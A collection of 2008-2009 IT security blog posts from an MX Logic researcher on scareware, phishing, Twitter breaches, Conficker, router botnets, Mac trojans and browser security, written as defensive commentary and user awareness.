IT Security Blog

ALERT: Over the next several weeks I will be transitioning the MX Logic IT Security Blog over to the McAfee Avert Labs blog.  Please continue to follow me there. 

Now onto today's blog post :)

Another celebrity death.  Another recycled scareware tactic attemping to lure users to download malware by telling them that their PC is infected with a virus.  We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year.  Now the attention of cyber criminals has turned to Monday's death of Patrick Swayze as the soup du jour for malware distribution.

Queries for information on the death of the popular actor may lead to news stories that look legitimate when returned in search results, but when followed will lead users to a site that looks like this:

 

This similar tactic of presenting a window to the user that looks very much like a legitimate Windows popup has been used many times before in various forms.  The Windows Explorer-like screen presented to the user also uses geolocation to attempt to identify the country and city that the user is coming from in an attempt to make the user believe that their data is actively under attack.  Popups with phrases like "Scan procedures finished.  34 Potential aggressive items was found!" and "Your computer remains infected by threats!  They might lead to data loss and file structure damage, and needed to be heal as soon as possible.  Return to Total Security and download it secure to your PC" also attempt to trick users into believing that the only way that they can protect themselves from infection is by downloading bogus security software.

Clearly scareware tactics are something that cyber criminals have latched onto as a popular method for malware distribution as it continues to be a recurring and evolving theme.  Conficker/Downadup largely popularized scareware with its success (although it wasn't the first to use it) and now others are riding of that popularity to repurpose it for their own scams.

 

Friday usually get people excited since it’s countdown to the weekend but this week we’re excited about it because we’re going to be having some stellar guests participate in the SecurityBuzz podcast.

As you may recall last week Robert Scoble’s WordPress blog Scobleizer was hacked. We’ve asked Scoble and Rob La Gesse, director of customer development at Rackspace to join us to discuss corporate blogs and security issues they face, how to prevent them, etc.

The podcast will be posted Friday afternoon so stay tuned. In the meantime, let us know if you have any questions you’d like for us to ask these guys and/or answer during the podcast. You can post them here or send me a note via Twitter - @smasiello.

In my copious amounts of spare time one of the things that I like to put thought into is where I believe the Threat Landscape is headed.  Even in just the last 10 years since the Melissa virus (yes, I know viruses extend quite a bit further back than that.  I'm just using this as a reference point) we've gone from mass mailing viruses to network worms that run through your network compromising any vulnerable host as quickly as it can to social engineering tricks that sometimes even make it difficult for the trained professional to tell whether something is real or fake. 

So, the question that I pose to myself is "What's Next?"  Taking even just the events of the last decade into account, where are we headed for the next few years?  Some of this is obviously hard to determine because that also involves being able to forecast what new technologies will be released, but we can start to make some assumptions based off of what is available today. 

Since this is a blog post, I'll try to keep this relatively brief.  Maybe it is something that I can submit as an article to some technology pub as a full byline article (Here's a free plug for the folks over at (IN)Secure Magazine, who just released Issue 22 today.  I like them and I've had the opportunity to write for them twice now) at some point soon.

Some things to think about:

-- The Insider Threat
Especially given the current economic conditions and the uneasiness around many offices around the country as to whether or not their companies will remain viable, organizations need to be ever cognizant of the data that is leaving their organization.  Given that the latest USB 3.0 spec that was released in November 2008 allows for data transfer speeds at about 5Gb per second sensitive, proprietary corporate data can be pulled off a company's network an onto a thumb drive faster than ever before.  Couple that with the number of disgruntled employees who either see the writing on the wall for their own jobs or who are upset at benefit and wage freezes/cutbacks, and you have a dangerous cocktail for data theft.  We need to make sure we are putting as much focus on protecting our sensitive assets from insiders who much more easily have access to proprietary data as we do keeping the external threats at bay.

-- VoIP
Voice over Internet Telephony technologies are being adopted at an ever increasing rate.  This is happening not only in the enterprise space, but in the consumer market.  Services like Vonage make it easier than ever for people to have portable phone numbers so that they can be easily reachable at local numbers by family members out of state.  VoIP implementations at organizations are also becoming ever popular as well.  As these technologies become more widely adopted we have started to see hints of what abuse of these tools might look like.  Throw away phone numbers used to make spam phone calls have started to become more common.  There are services available online which allow you to purchase throw away numbers in blocks.  Spammers and can use and abuse these numbers just like they do IP addresses now. 

Another thing to watch out for is the compromise of VoIP systems as vulnerabilities start coming out in larger quantities.  Threats like direct voicemail injection will become another method that cyber criminals will use in order to get advertisements delivered to end users.  As the social engineering used in these threats improves, they could easily be used to steal personal identities and corporate data. 

-- Mobile Malware
Let's face it.  The phones that we carry in our pockets are little personal computers.  Although they lack the computing power of the quad-core processors now becoming commonplace on personal computers, they are another "always connected" device that people always have turned on.  I think the only time that I turn mine off on a weekly basis is when we are doing our weekly recording of the Security Buzz podcast, and that is mainly because the GSM buzz wreaks havoc with the microphones (and our Executive Producer's headphones :) ).  As mobile phone manufacturers have opened up their APIs to developers to create third party applications, they will need to be ever diligent in their QA processes to make sure that applications don't get posted to their distribution channels that contain some form of malware or open up a trojan backdoor to the device.  The mobile phone industry is growing by leaps and bounds with the addition of new, better, more feature rich smartphones entering the market.  The smartphone market is too large of a target for cyber criminals to ignore, especially if you consider the value of the data that we are now storing on these devices.  Secure sandboxing of third party applications is a must, but that is only a start.  Only hundreds of mobile malware variants exist today (compared to the approximately 1 every 4 seconds that is released for PCs), but that number is slowly growing and as hackers pay more attention to how they can penetrate mobile devices, that number is sure to only increase.

-- Social Networking
Social networks provide an interesting shift in the information sharing game because the rules that typically govern what personal data people are willing to share seem to have gone out the window.  This has really opened the door for cyber criminals.  With the data that is now available online through the use of social media sites like Facebook, Myspace, and Twitter criminals can much more easily target attacks to specific individuals or groups of individuals using data made available via public profiles or geolocation tools that map your IP address to what town you live in (or near) so that they can deliver compelling content which direct you to malware infected downloads (ala the Waledac botnet).  The Web of Trust that exists between users on social networking sites is being actively exploited regularly by hackers looking to take advantage of the fact that users will click on whatever their friends send to them.  It's already been proven that people will click on links and open attachments from people they don't know so why would they judge more closely the content from those that they do.

-- Political Hacktivism
Recently cyber criminals have picked up the pace a bit with respect to using online resources like social networking sites to quickly spread political messages in order to help them spread propaganda and recruit people to fight for their cause.  Due to the sensitive nature of political issues and the passion that people have for them, social engineering techniques like creating highly controversial views on sensitive topics is something that cyber criminals will latch onto in order to get people to react quickly and irresponsibly to either open attachments or visit websites that they would normally scrutinize more closely. 


These are only a small sampling of what I believe we will be encountering as we move forward (I didn't even go into the increased prevalence of compromise of legitimate web sites, and the further use of file sharing services, and calendar spam!), but they are things that we will need to keep top of mind as we look toward what threats are coming down the road.  Hackers will go where the money is and the money is where the people are.  So, whether it is Twitter, MySpace, Facebook, email, instant messenger, or our phones, criminals will leverage whatever technology is available because in their eyes the goal is to make money regardless of the available technologies, and if one person can be the one to figure out how to exploit a technology for their own financial gain before the others they'll end up getting the lion's share of the notoriety as well as beat defense mechanisms to the punch.

Our Threat Operations Center has recently noticed a new type of phishing campaign attempting to phish login credentials to Yahoo!'s Local Search Marketing tool.  This is similar to the Google Adwords phishing campaign that we reported back in May 2008 attempting to obtain login credentials to Google's Adwords site from customers.  In this instance the email that is being sent is spoofing a from address @yahoo-inc.com (Yahoo's internal email domain) and trying to convince the user that their account is about to be suspended.  Sounds like just about every other phishing campaign, right?

The phish reads as follows:

Dear Advertiser,

We just want to remind you that, on August 25, 2009, your Local Sponsored Search account will be discontinued. You will be upgraded to a new Sponsored Search account with geo-targeting and other great new features.

Please note the following: In order for us to upgrade your account you need to verify your user/password of your account. Please remember to input your Sponsored Search user and password correctly NOT your email and password.

Please visit the following link to verify your account:
hxxp://onlinemarketingyahoo.com/adui/signin/loadSignin.htm

Sincerely,

Your Partners at Yahoo! Search Marketing Copyright 2009 Yahoo!, Inc. All rights reserved.


Note the generic nature of the introduction, which should generally be one of your first tipoffs that the email is not authentic.  If you have a personal relationship with a company and they wanted to send you an important email communication they would use your real name.  Also note the missing period between "onlinemarketing" and "yahoo" in the URL.  If you weren't looking closely, this could be easily missed by someone reading the email (even if it were present, the actual URL for Yahoo!'s Local Advertising tool is "searchmarketing.yahoo.com", not onlinemarketing,yahoo.com.  This point might also be missed by the casual recipient.

The potential audience being targeted by this email is somewhat limited because it will only make sense to those who are customers of this Yahoo product.  That rarely seems to stop most spammers.

As news of the most recent Twitter breach spread and details of what was compromised started to come forth the question that was at the forefront of my mind was "Whatever happened to responsible disclosure?" where you notify the vulnerable party, give them ample time to fix the problem, and if any information is released publicly, it is done after the problem has been confirmed resolved by the vendor.

According to the article on TechCrunch that contains data that was stolen, they "spent much of the last 36 hours talking directly to Twitter about the right way to go about doing that" (where that = the right way to go about releasing the data).  Now I was certainly not privied to those discussions, but I have a hard time believing personally that those discussions involved Twitter saying "yes, please post the information, but just leave out the secret sauce bits."  I don't understand what criteria TechCrunch used such that they are now the governing authority over what is and is not confidential or why they feel they have a right to make that call to begin with.  I am disappointed that a purportedly reputable news organization would feel that they have such privilege. 

In a follow up post TechCrunch attempts to justify their actions by pointing to previous cases where they and another news organization had each taken it upon themselves to post sensitive information.  I guess that means that since there is a precedent for something happening that it somehow makes it right?  They also state within this article that they "break big stories."  Obviously, those that break the big stories get the big press, but let's not also forget that a certain level of responsibility is expected as well.  Saying that "others do it too" as justification for doing anything is just plain juvenile. 

Of course, let's not let the person who leaked the information to TechCrunch off the hook either as they are certainly culpable as well.  At this point nobody seems to know who that person is (at least not publicly).  This mystery person submitted the information with the expectation that it would get published.  Otherwise, why send it to a news organization to begin with.  They baited the hook and TechCrunch bit down hard. 
Whether TechCrunch will end up facing any legal action from Twitter remains to be seen.  Twitter might want to consider at least sending TechCrunch a thank you note for at least temporarily turning the stink-eye from this whole mess away from themselves as TechCrunch appears to be getting flamed worse than Twitter, who had the breach to begin with!

Funny how things work sometimes :)

It looks like the Hack du Jour, Twitter, has had another high profile data breach.

It seems like we have been around the block on this topic before on a couple of occasions, haven't we?

According to TechCrunch the cause of this most recent data breach isn't stolen Twitter account credentials because of ClickJacking exploits or people who have given up their logins because of look-alike Twitter application sites.  This exploit was far more elementary and one that Twitter could stand to learn a lesson from on their own account signup form: weak passwords.  According to the TechCrunch article, the password to some of Twitter's publicly facing servers was "password".  Maybe they thought that was too easy for people to guess and that nobody would actually try a password as simple as "password" ?  Either way, this is another example of how Twitter needs to take its own security and the security of its users much more seriously.  Strangely enough repeated lapses in judgment does not appear to have slowed their growth.

The portion of the MSNBC article that I linked to in the first paragraph that irked me the most was in the section titled "Dangers Highlighted" where the author states that "The techniques used by the hackers to obtain access to Twitter highlight the dangers of a broader trend promoted by Google Inc. and others toward storing more data online, instead of on computers under your control."  I couldn't disagree more with this statement.   The missteps by Twitter that have caused their recent compromises are not a result of a lack of standards or good security practices by cloud computing, SaaS, or other off-network service providers.  They are a result of Twitter's poor security practices and Twitter's alone. 

Any service provider, construction outfit, or home business who has their own network equipment needs to ensure that they have taken proper precautions to secure those devices.  That includes changing default passwords and identifiers (like SSIDs on wireless access points) all the way through to keeping those devices up to date on security patches and application updates.  These are not practices that are relevant to Cloud Computing providers alone.  To insinuate such in an effort to spread FUD against these types of services is downright irresponsible, in my opinion.  We're talking about best practices that need to be employed by everyone in all industries and form factors.  Perhaps if we did that instead of just talking about it and always looking to point the finger at someone when they make a mistake we would have less people to point fingers at.

Research was published yesterday coming out of Carnegie Mellon University that states that the number of potential combinations of what your social security number could be is limited based on publicly available information such as your birth place and date. 

This is significant because places like financial and educational institutions (among others) frequently use the SSN as either a method of verifying who you are over the phone or as a method of authentication on web sites greatly increasing risk of identity theft.  As a side note, organizations like the American Health Information Management Association (AHIMA) published an article back in 2006 recommending against using SSNs as an identifer in systems that contain health care data.

According to the research, you "could identify in a single attempt the first five digits for 44 percent of deceased individuals who were born after 1988 and for 7 percent of those born between 1973 and 1988. They were able to identify all nine digits for 8.5 percent of those individuals born after 1988 in fewer than 1,000 attempts".  In the instances where the first 5 digits of a 9 digit SSN could be identified in the first attempt, this narrows the number of possibilities of what your SSN could be down to only 10,000, which is essentially the same as being able to determine someone's 4-digit PIN.  Trivial by today's technology standards.  Since the Social Security Administration's Death Master File can be purchased online for about $7,000 (if you live in the US, Canada, or Mexico; about $15,000 otherwise) according to Steve Goldsby's blog this cost could easily be recouped after only a few identity thefts.  This is pretty good ROI for cyber criminals despite the up front cost.

Just about anyone and everyone who is active on the internet is either using, has used, or at least has heard of Twitter, the micro-blogging service that grew in usage by 752% in 2008 and is poised to grow even more in 2009. 

As we know, where there are users, there are hackers.  Any technology that has grown in popularity at the speed of which Twitter has is certain to become a target for information and money stealing cyber criminals.  As such, Twitter has been the target of several application exploits over the last few months including a Samy-like exploit which would force users to follow you, multiple Clickjacking exploits, and two worms dubbed Mikeyy and Stalkdaily just this past weekend.
Funny enough, one of the things that is frequently part of the fallout of numerous security exploits is a drop in brand trust and user confidence.  So far, that fallout does not appear to have taken place with Twitter.  At least based on the reported numbers, Twitter's growth does not seem to have been hampered at all despite the numerous security flaws that have been patched over the past 8 months.  Perhaps this is because there hasn't been a serious incident of data theft or widespread malware infection as a result of one of these exploits.  Rest assured, those are coming!

So, what can we learn as a result of Twitter's recent security woes? 

I believe that one of the most important lessons to be learned from Twitter is the need to ensure security is being built into your product from the concept and design phases, not after the code has been consumed by the public.  This is true for online applications like Twitter as well as boxed software that you buy in the stores.  Don't let your customers be your test bed to identify security risks because you can bet that criminals will find them and exploit them before your customers do.  At that point you have put your customers at risk also.  It is far cheaper and less damaging to your corporate brand and reputation if security risks are identified up front, before any code is launched than to try to retrofit security into a live product.

Up to this point the vulnerabilities exposed on Twitter have largely been considered annoyances.  I was unable to find any reports of identity or financial theft as a result of a Twitter exploit, and again perhaps that is why they haven't been placed under the same microscope that Microsoft and Google have been.  Don't take these proof-of-concept quality threats lightly though as they could easily have been much more nefarious than they were.

Let's take the Mikeyy worm as a primary example.  One of the ways that Mikeyy would spread is by sending Tweets out under the accounts of infected users trying to lure their followers to visit the profile of another Twitter user that exploited a site flaw.  Once that page was visited the user's account was hijacked and Tweets would be sent out as them to their followers trying to trick them into clicking also.  Rinse and repeat.  In this instance the worm was merely spreading out across Twitter to anyone who was fooled into clicking the link presented in the Tweet.  What if this link was forwarding unsuspecting users out to a drive by malware site that installed malware like Storm or Conficker?  In a previous post we discussed how URL abbrevation services can potentially hide an underlying threat vector to redirect users to malware drive-by or phishing sites.  Granted, that example isn't one of a specific Twitter flaw, but it is just another thing that users of the popular service need to be on the lookout for.

In its short existence Twitter has almost single handedly revolutionized how we communicate (in 140 characters or less :) ) online.  Whether you are using Twitter to communicate with friends from school, family, or professionally to keep up on market trends or as another method to increase your brand awareness (a recent report by comScore said that more than 50% of Twitter users are between 25-54 with most users being on the upper end of that scale), Twitter has stormed onto the social media scene and has already become an important part of how people communicate online.  I use it myself.  As such, it creates another avenue by which we need to make sure we educate ourselves and our users about the potential for online threats.

I am guessing that most people are suffering from Conficker information overload today!  As such, it is very important to be able to separate the Conficker Facts from the FUD.  In case you have not yet seen it, I blogged last week about what I believe will (not) happen when the Conficker.C variant activates tomorrow, April 1st.  Up to this point we still have not yet seen anything that would lead me to believe anything contradictory to that statement.

I read a couple of places yesterday about a flaw in the C variant of the Conficker worm that identifies infected machines on your LAN differently than machines that are not infected.  According to Dan Kaminsky's blog, this flaw causes a function named NetpwPathCanonicalize() to work differently in the infected version than the version in either the patched or unpatched versions of the Windows OS.  This different behavior is what folks like McAfee, Nessus, Qualys, and others are using to key on to develop a scanner to identify infected hosts.

Although a tool is great to identify machines already infected with the Conficker worm, it is more important to emphasize and re-emphasize the importance of patching and multiple defense layers (from out in the cloud all the way down to the network endpoints) to mitigate these types of infections to begin with.  In the interim, if you believe that machines on your network may currently be infected with the latest Conficker variant download the proof of concept scanner and put together a quickly actionable plan to clean these machines up.

Word is spreading of a botnet called Psyb0t that is going around and compromising the home routers of people who have not changed the default login password on those devices.  According to published numbers around 80,000-100,000 Linksys and Netgear routers have been affected by Psyb0t.  It is important note there are a couple of criteria that must be met before your router can be exploited via Psyb0t.  First, the router must be a MIPS device (x86 devices are not vulnerable to Psyb0t).  Second, it has to be configured to be administered remotely (from the internet, not the local LAN), and third it needs to be using the default password that the device was originally configured with (a common insecure practice).

Although Psyb0t is the first botnet alleged to be exploiting home routers, the concept of compromising routers with default passwords is not a new one.  One of the things that I have the honor of doing as part of my job is a quarterly section for SC Magazine called the "Threat of the Month".  The piece that I submitted for their February 2009 issue was on the topic of "Drive By Pharming".  Essentially what drive by pharming entails is the compromise of home routers that have the "Remote Administration" port enabled so that you can modify their settings from the internet.  If the factory password is still set as the password used to login to the device it is trivial for an attacker to get in, modify your settings to point you to a malicious DNS server such that traffic to legitimate sites gets repointed to sites setup to phish passwords or inject malware.  That is only one possibility.  Another is that a new version of firmware could be uploaded to turn the device into a bot. 

At their core, these home routers are mini computers, susceptible to attack and infection if proper precautions are not made to protect them.  Default passwords for just about every router made are trivial to find on the internet.  In fact, there are sites setup, like routerpasswords.com, that allow you to select the manufacturer of the router and it will tell you the default password based on their known models.  Be sure to secure all layers of your home or business (plenty of SOHO businesses use standard Cable/DSL modems for their internet connectivity) network.  Never assume that this is being done by someone else or that it is someone else's responsibility.  The default settings on most of the gear that you will buy are setup such that initial access and administration of the device is easy (reduces support costs and angry customers).  From there it is up to you to make sure best practices are followed to keep your network and data secure from outside intrusion.

We will touch on this in some more detail during the Security Buzz podcast (Episode #25) that will be recorded this Friday, but I wanted to make a couple of comments here as well about an article that was posted on canada.com regarding a Staples Business Depot Store in Ottawa, Ontario that sold a returned hard drive that still had a number of personal files on it. 
To summarize the article, a woman named Jill Vickers, a retired political science professor from Carleton University had purchased an external Maxtor Mini portable drive, then attempted to return it to the store after her son noticed that the automatic backup function was not working properly (Vickers had already put a number of her personal files, including some that contained sensitive information on the drive). 

Staples is getting a lot of the bad press here for not properly wiping the drive prior to putting it in the clearance bin.  Staples says that it is standard operating procedure to wipe "anything with memory" prior to it being resold.  So, mea culpa on Staples' part in this case for not following their own policy and so the negative attention is well deserved.  What the article doesn't state is "how" they wipe the drive.  Is it a quick format?  Is it being wiped to DoD standard?  This is a point left to speculation, but I think is an important point nonetheless because I don't think you can expect the average consumer to know the difference and why that difference is important.   

That being said, I believe that Vickers deserves at least part of the blame as well.  If the data that she was storing on the drive was so important to her and if it was potentially sensitive, she (or her son) should have thought to at least take basic steps to ensure that this information was not readily visible to anyone who would be handling the drive (including the employees of the Staples store that she returned the drive to).  Even if Vickers isn't familiar with the different types of data deletion standards that are out there, doing a "Select All" and then "Delete" on the files contained on the drive is certainly better than nothing at all.

I guess the best take away from this experience for the rest of us is that we should always be taking whatever steps necessary and possible to protect our own sensitive data from potential exposure because even if others who are handling our information have protection policies in place.   You cannot rely on them to be followed.

I have been starting to feel like I have hardly been in the office over the past month.  After attending MAAWG in San Francisco for a week in mid-February I was in town for a week and a half before going on an extended vacation/business trip to Orlando for InfoSec World 2009 and some time visiting my wife's family.  I am finally back in town and expect to be so for about the next month until RSA rolls around in late April so expect to see regular blog updates rolling out again.

I wanted to take a few minutes to talk about something that has kind of been bothering me lately.  It is something that I have been hearing more and more of in passing conversation as it relates to browser security, in particular between Firefox and Internet Explorer.  Similar to the debates that have been raging for a few years now between the "security" of Apple's OS X (and previous versions) as compared to Microsoft Windows are debates between how using Firefox is a more secure browser than Internet Explorer. 

Is it, really?  Or Is it just a matter of perception? 

At the end of the day, the level of security of any application installed on our computer is a combination of the vendor's ability to release timely updates to address new security issues, and the user's ability/willingness to install those updates.  The discussion about application security is completely irrelevant if user's do not install the updates that the vendor provides. 

Take this recent analysis of the Conficker worm/botnet as an example.  According to the report, more than 90% of the users who got infected with Conficker got infected while using Internet Explorer 6, the default browser that comes with Windows XP.  Windows XP is also the OS that has the highest concentration of infected Conficker users, but that is to be expected as it is currently the most deployed Windows OS version.  What this tells me is that many users who are running Internet Explorer 6 are not keeping it up to date with updates and patches.  This is also somewhat to be expected because the largest concentration of infections are in countries like China, Brazil, Russia, and India who also have some of the highest numbers of pirated copies of Windows in the world.  You could argue that this might not be the best example of browser security because Conficker is an exploit for an OS level vulnerability, but the reasoning is still sound in that if you aren't applying OS patches you likely aren't patching your browser either.  If you aren't familiar with the "insecurity iceberg" report, I would recommend it.  It is a good read as it outlines browser and plugin usage across many different data cross-sections to illustrate that browser security is about more than just the browser.  It also includes the many plugins that are available such as Adobe Flash, Java, Apple Quicktime, and Adobe PDF Reader. 

So, to go back to my original question, is Firefox really more secure than Internet Explorer?  In addition to my previous argument about patching, I believe this also comes down to an issue of perception.  For example, Firefox releases security updates more frequently than Internet Explorer.  Does that make it more secure or less secure?  Additionally, Firefox has a "nagware" type of feature where it regularly throws popups at you when a new version is available encouraging you to upgrade to the latest and greatest version of the browser.  This gives the impression to the user that they are being kept safer.  Second, Firefox has an active community of developers creating plugins for Firefox that help create additional security features on top of what the browser already provides.  Neither Firefox nor IE have any native protection against what is known as Clickjacking.  With Noscript, a plugin available for Mozilla based browsers like Firefox (et al), Clickjacking protection can be added.  IE currently has no protection available although it is being planned for IE 8.  Another security threat that I have written about previously is the danger that can be introduced by URL abbreviation services like TinyURL and SnipURL.  Firefox has a plugin that will allow users to preview where these abbreviated URLs will really take the user before they click the link.  URL abbreviation services are being used more and more by phishers and malware creators to trick users into clicking on legitimate looking links and redirecting them to malicious web sites.  So, there are security related addons that users can plug into their browsers if you know what the good, actively maintained ones are and know where to look, but this functionality isn't native to the browser and leaves the user with having yet even more software to have to update.

You could make analogies between the OS X and Windows debate here too.  Apple users claim they don't have the malware problem that Windows users have.  In sheer volume of released exploits, this is certainly true, however you are also dealing with a much smaller market share.  Is the reason that Firefox exploits haven't been more widely targeted that they just don't have the market share to support the effort on the part of cyber criminals? 

My point is that there are compelling arguments on both sides of the browser security war debate, but at the end of the day is onus is still on the user to make sure their software (includes both browser and plugins!) is patched regularly, and that they are employing additional security measures like anti-virus and outbound traffic blocking firewalls to reduce their risk.  More online threats are moving to the browser every day so having multiple layers of defenses in place at different points of the network remains your best method to minimize risk. 

Last week Heartland Payment Systems Inc reported a data breach of over 100 million credit card numbers and cardholder names.  Monster.com is now also reporting a compromise of passwords, user IDs, names, email addresses, and other PII of an undisclosed number of accounts and is advising all of its users to change their passwords immediately.  It's too bad that most of monster.com's users only regularly access their accounts when they are actually looking for a job which means that many may never get the message or take the time to update their password.  This leaves a lot of accounts as wide open opportunities for identity and data theft.

Combine all of this news with this report on CNN Money that over 71,400 jobs were lost today alone (when I last looked at the report it was 68,000 so the number is getting larger as the day wears on!) and we have a dangerous cocktail for fraud and fraud victims!

So, it is a given that there will be more (and already has been) fraudulent activity related to the monster.com and Heartland breaches.  The bigger problem that comes out of this is that we now have over 71,400 people now trying to figure out how they are going to support their families and themselves while they look for new employment. 

These newly unemployed job seekers are now prime targets for cyber crime.  Whether it be stock pump and dump scams, fraudulent IRS refunds, phony job announcements (work at home opportunities appearing to come from monster.com?), or "make a quick buck" schemes, people in vulnerable positions are frequently the most likely victims of criminal activity.  As such, it is important for everyone to be more diligent than ever in trying to separate the wheat from the chaff as it relates to any kind of "too good to be true" offer.  Good social engineering preys on weaknesses and stresses a potential victim's urge to "act now".  During times of unemployment or uncertainty your inherent ability to judge is clouded and irrational decisions are often made resulting in more complicated problems.  Be educated, be aware, and be diligent.  Don't be a victim.

Following on the heels of last week's announcement of a trojan horse being installed as part of some pirated copies of iWork '09 for the Mac being distributed on peer-to-peer file sharing services comes another announcement that a trojan has also been identified in pirated versions of Adobe Photoshop CS4 for the Mac.

No word yet on whether the new Photoshop trojan was created by the same people who created the iWork trojan that was used to launch DDoS attacks. 

It is important to note that these trojans do not attempt to infect other computers, rather they stay resident on the local machine.  Since the trojans run as root, it is possible that once it has been installed it could be used to affect other applications.  Since these trojans also have a phone home component it could (not confirmed) be used for information theft as well.

Trojans being distributed via applications shared through peer-to-peer file sharing services are nothing new in the PC world, but have recently been garnering more attention for Macs as Apple's computers have been gaining market share.  The Mac fallacy of invulnerability is being challenged more frequently now.  It looks like Apple has finally gained enough penetration into the computer market that cyber criminals are targeting them and their users with more regularity.  This is a trend that will certainly continue especially if you consider the number of Mac users who have resisted purchasing security software in the past.

Recently, SC Magazine posted an article that quotes a report by Forrester Research which claims that security spending will be higher for both SMBs and Enterprises in 2009.  This makes sense to me.

As businesses are looking for ways to cut costs across every department security remains one of, if not the most, important IT matter they still need to be sure is addressed over the course of 2009.  As such, matters like inbound spam, viruses, application level intrusions, data leakage protection, web threats, archiving, and compliance will still need to receive top priority as cyber criminals are not feeling the same effects of a downturned economy as everyone else is.  As such, their efforts will not be slowed which means that businesses of all sizes need to be as diligent as ever.  Organizations are looking to outsource some of their daily tasks that are outside their core competencies so that they can refocus their IT resources towards the company's business objectives, typically at less cost and more effectively than can be accomplished internally. 

2009 will certainly be an interesting and exciting year for security as network and application threats become more undetectable and uncleanable by existing technologies and businesses look for ways to protect their intellectual property.  The definition of the "network endpoint" has become more and more unclear with mobile and social networking technologies becoming the norm rather than the exception.  This creates a large burden as companies try to come to grips with how much of their confidential, proprietary information is floating around freely on the web.  As such, IT security spending will be a more prominent a budget line item than in years past.  If it isn't, then a company's level of risk increases exponentially.

I wanted to take a few minutes and post a follow up to my blog the other day about an article written by Lance Winslow that was originally written in 2005 and reposted here by ezinearticles.com with the date of December 31, 2008 making it appear as if the content was written recently by Lance. 

Businesses do have a lot of choices when making decisions about protecting their network infrastructures.  They can choose to do it in-house using a number of open source solutions or commercial desktop software.  They can also purchase a network based appliance which also typically has to be maintained in-house or businesses can look to in-the-cloud solutions using a Managed Service like MX Logic (I'll reiterate my partiality to Managed Services :) ).  No matter which type of solution you prefer for your organization, most all are effective at stopping spam.  Some of the bigger questions that must be answered by any company when making these decisions is how much control they want to have, how much risk they deem to be acceptable in the event of a large outbreak from a bandwidth perspective and what they want their internal resource allocation to be to managing these solutions. 

Overall, spam rates are still down about 45% from their most recent peak in August to now as a result of the McColo shutdown.  Despite the movement to the web as a primary malware delivery vehicle and with occasional peaks and valleys in mail flow over short periods of time, spam volumes historically continue to increase and will continue to do so.  The biggest reason for these historical increases are improved attack precision (i.e. more targeted attacks and less en masse spam campaigns) and refined social engineering which dupe users into opening attachments and visiting web sites that enlist their PC into botnets. 

I do agree with Lance's point with respect to the efforts already put forth by the FTC as being largely fruitless.  There have been few arrests since CAN-SPAM went into effect 5 years ago.  At the end of the day, spammers are criminals and should be arrested, but cooperation is needed by many others outside of law enforcement like the upstream bandwidth providers and domain registrars if we are really to make a dent in the spam problem.

At the end of the day whether spam volumes are up or down, cyber crime is both a criminal as well as a social problem.  I think the criminal part is pretty self-explanatory, but the what drives people to cyber crime?  Money.  Lots of it.  WIth the relatively few arrests that have been made in comparison to the number of spammers trying to fill our inboxes on an everyday basis, cyber crime is considered to be a low risk, high reward venture.  Considering the difficult economic times we are now in the middle of where companies are tightening their belts as much as possible and unemployment is rising on a daily basis it would not be surprising if you see more people getting involved in cyber crime activities. 

So, to come back to my original point before going on a bit of a tangent: Is an article written back in 2005 about spam volumes, tactics, and defenses entirely relevant today?  I would say both yes and no.  Although tactics have evolved and businesses are feeling more and more pressure every day to find ways to keep their mail servers online and prevent confidential data from leaking out of their networks, there are a lot of options available.  Businesses need to evaluate which type of solution provides them with the options and features that best suit their business and compliance needs.

According to this RWW (Read Write Web) article posted on Saturday, a recent cyber war simulation revealed that the United States is not equipped to handle a major attack against its computer networks. 

This news is not new. 

Other articles have been published (example from Signal Online here) about the vulnerability of the United States to a cyberterrorism attack, but we are not alone. 

Be sure to understand that this is not potentially just a United States issue, it could be a world-wide issue.  South-East Asia is vulnerable according to this article from DarkNet.  Microsoft claims that Europe is also a likely target for attack.  Siliconindia.com wrote last Thursday that India is also vulnerable to cyberterrorism.  Many other countries surely are as well.

If such an attack were to happen (and to be honest, I am not entirely convinced that this would actually happen, but I am certainly not discounting the need for increased security awareness regardless of its potential effects either) on any of the major economies, its effects would be experienced at a global level. 

One of the many items that Obama is being pressed on as he puts together his new administration is the creation of a National Office for Cyberspace that is headed by a new Cybersecurity Czar.  I believe that this is a good idea if the right appointment is made, but neither that person nor the Cyberspace Office can act in a silo.  They need to coordinate with other nations and create uniformity in establishing policies and procedures.  An obvious question that then arises out of all of this is "Are the policies enacted by the National Office for Cyberspace going to be compulsory for Government Agencies or on the Finance, Telecom, and Energy industries only?"  Secondarily, if these policies will also be required for small businesses and enterprises, what will be the cost to them? 

The RWW article also asks the question on whether or not the White House is the right entity to be coordinating this effort for the United States.  A good question considering their track record in addressing issues like spam via the CAN-SPAM act, which just celebrated its fifth birthday.  Despite that negative mark though, I'll ask the question for discussion as to who else could coordinate this effort and achieve the necessary involvement from the EU, India, South-East Asia, et al?  If there is such a group, let them step forward.

There are clearly a lot of questions that are as of yet unanswered and likely will not be answered for the foreseeable future.  Here's to hoping that the Obama administration will be taking the cybersecurity initiative as a whole (not just from the cyberterrorism angle) seriously and that he also solicits the opinions and ideas of the security industry when making any decisions.  We have a lot of ideas and recommendations that should be seriously considered.

It looks like Apple has finally changed their tune as it relates to using security software on their PCs and is now telling their users to make sure they have antivirus software installed.  See article here.

This move was inevitable.  At some point Macs would gain enough market share for them to become more of a target for hackers and cyber criminals.  Most security researchers have been saying that for a long time, and I applaud Apple for finally coming to that realization also, even though it really should have been said some time ago.  Now the Mac users who have long been saying that they don't need to worry about malware "because they run a Mac" really don't have a leg to stand on as even the manufacturer of their computer has come out and contradicted that claim.

From a timing perspective this announcement comes at a good time as well.  As IT managers are working on their 2009 budgets, this is now something that they need to include as another line item to allocate money for early in the year.  If your Mac does not already have some kind of antivirus software installed, the time is now to get it.  Apple's personal computer market share continues to increase which means its prevalence as a target will also continue to rise.  Don't be left holding the bag either as a personal Mac user or as a corporate user.  Macbots are coming.  iPhones and iPods will not be far behind.

*** UPDATE 12/2/2008 4:42pm MST ***  So it looks like I need to recant a little bit.  If you look at Apple Knowledge Base Article 4454, you notice the last updated date of December 2, 2008.  This article was originally published back on June 8, 2007.  Unfortunately, the existence of this article hasn't changed most Mac user hubris in their invulnerability to malware because the fact of the matter remains that many Mac users still don't use antivirus software on their machines.  The time is still now to change that.  A widespread Mac virus could be a devastating event!

